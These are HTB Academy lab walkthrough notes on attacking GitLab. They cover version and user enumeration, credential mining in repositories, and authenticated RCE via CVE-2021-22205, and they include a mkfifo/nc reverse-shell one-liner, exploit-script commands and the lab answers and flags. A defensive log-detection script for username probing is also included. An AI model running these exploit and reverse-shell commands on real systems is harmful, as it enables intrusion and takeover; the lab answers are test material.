GitLab Discovery & Enumeration
Objective: Discover GitLab instances, enumerate version information, and extract sensitive data from repositories including credentials and configuration files.
Overview
GitLab is a web-based Git repository hosting tool with wiki, issue tracking, and CI/CD capabilities. Instances often contain sensitive data, hardcoded credentials, SSH keys, and configuration files in public or internal repositories.
HTB Academy Lab Solutions
Lab 1: Version Enumeration
Question: "Enumerate the GitLab instance at http://gitlab.inlanefreight.local. What is the version number?"
Target: gitlab.inlanefreight.local (add to /etc/hosts)
Setup & Access
# Add vHost to hosts file
echo "10.129.201.88 gitlab.inlanefreight.local" >> /etc/hosts
# Access GitLab instance
# URL: http://gitlab.inlanefreight.local
Version Discovery Methods
Register account (if allowed) → /help page shows version
Public projects exploration → /explore for accessible repos
Low-risk version detection techniques
Answer: 13.10.2
Lab 2: Credential Discovery
Question: "Find the PostgreSQL database password in the example project."
Repository Investigation
Browse public projects via /explore
Check "Inlanefreight dev" project
Search through files for configuration data
Look for database configs - config files, environment variables
Check commit history for accidentally committed credentials
Found in: Configuration file or environment setup
Answer: postgres
Discovery Techniques
1. GitLab Detection
# Standard GitLab indicators
- /users/sign_in (login page with GitLab logo)
- /explore (public projects page)
- /help (version info - requires auth)
2. User Enumeration
# Username enumeration via registration
# Try common usernames: admin, root, administrator
# Error: "Username is already taken" = valid user
3. Repository Mining
Public repos via /explore
Search functionality for keywords
File exploration for sensitive data
Commit history review
Common Findings
Sensitive Data Sources:
Configuration files (database.yml, config.php)
Environment variables (.env files)
SSH private keys
API keys and tokens
Hardcoded passwords
Attack Vectors:
Account registration → internal repo access
Credential reuse from found passwords
SSH key usage for system access
API abuse with extracted tokens
HTB Academy Attacking Labs
Lab 3: User Enumeration
Question: "Find another valid user on the target GitLab instance."
Method: Automated User Enumeration
# Download GitLab user enumeration script
searchsploit -m ruby/webapps/49821.sh
# Run user enumeration
./49821.sh --url http://gitlab.inlanefreight.local:8081 --userlist /opt/useful/SecLists/Usernames/cirt-default-usernames.txt | grep exists
# Result: [+] The username DEMO exists!
Answer: DEMO
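Detection for the username probing described in the User Enumeration technique and in Lab 3, as an added example that is not part of these notes or the HTB lab: it parses constructed access-log lines and flags any source that checks many distinct usernames within a short window. It assumes the instance's sign-up page performs its per-username availability check at /users/<name>/exists and that the front-end proxy writes NCSA-style access logs; both the log lines and the path pattern are assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (NCSA common format); not real traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [12/Mar/2024:10:00:01 +0000] "GET /users/admin/exists HTTP/1.1" 200 17
10.10.14.5 - - [12/Mar/2024:10:00:01 +0000] "GET /users/root/exists HTTP/1.1" 200 17
10.10.14.5 - - [12/Mar/2024:10:00:02 +0000] "GET /users/administrator/exists HTTP/1.1" 200 18
10.10.14.5 - - [12/Mar/2024:10:00:02 +0000] "GET /users/demo/exists HTTP/1.1" 200 17
10.10.14.5 - - [12/Mar/2024:10:00:03 +0000] "GET /users/guest/exists HTTP/1.1" 200 18
10.10.14.5 - - [12/Mar/2024:10:00:03 +0000] "GET /users/test/exists HTTP/1.1" 200 18
192.168.1.20 - - [12/Mar/2024:10:00:05 +0000] "GET /users/sign_in HTTP/1.1" 200 5120
192.168.1.31 - - [12/Mar/2024:10:01:00 +0000] "GET /users/alice/exists HTTP/1.1" 200 17
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Assumed path of the per-username availability check the sign-up page performs.
EXISTS_RE = re.compile(r"^/users/([^/]+)/exists$")

def parse_line(line):
    """Return (ip, time, method, path, status) or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def find_enumeration(log_text, threshold=5, window_seconds=60):
    """Map source IP -> sorted distinct usernames for every source that checked
    at least `threshold` distinct usernames inside some `window_seconds` window."""
    probes = defaultdict(list)  # ip -> [(time, username)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, _ = rec
        m = EXISTS_RE.match(path)
        if method == "GET" and m:
            probes[ip].append((when, m.group(1)))
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, events in probes.items():
        events.sort()  # chronological, so each start opens a forward-looking window
        for i, (start, _) in enumerate(events):
            in_window = {name for t, name in events[i:] if t - start <= window}
            if len(in_window) >= threshold:
                flagged[ip] = sorted({name for _, name in events})
                break
    return flagged
```

A single availability check from a normal sign-up (192.168.1.31 above) stays below the threshold, so only the scripted burst is reported.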
Lab 4: Authenticated RCE
Question: "Gain remote code execution on the GitLab instance. Submit the flag in the directory you land in."
Method: CVE-2021-22205 (ExifTool RCE)
# Download RCE exploit
searchsploit -m ruby/webapps/49951.py
# Start listener
nc -nvlp 9001
# Execute RCE (requires valid account: HTBAcademy:password123)
python3 49951.py -t http://gitlab.inlanefreight.local:8081 -u HTBAcademy -p password123 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc PWNIP PWNPO >/tmp/f'
# In reverse shell:
cat flag_gitlab.txt
Answer: s3cure_y0ur_Rep0s!
Attack Summary
Vulnerabilities:
User Enumeration - Registration page validation
CVE-2021-22205 - Authenticated RCE via ExifTool metadata
Self-Registration - Often enabled for easier access
Attack Chain:
User enumeration → Find valid accounts
Account creation → Register if allowed
Repository mining → Extract credentials/data
RCE exploitation → Authenticated command execution
Pro Tip: Always check both public repos and try to register for internal access; many GitLab instances allow open registration, revealing additional sensitive repositories.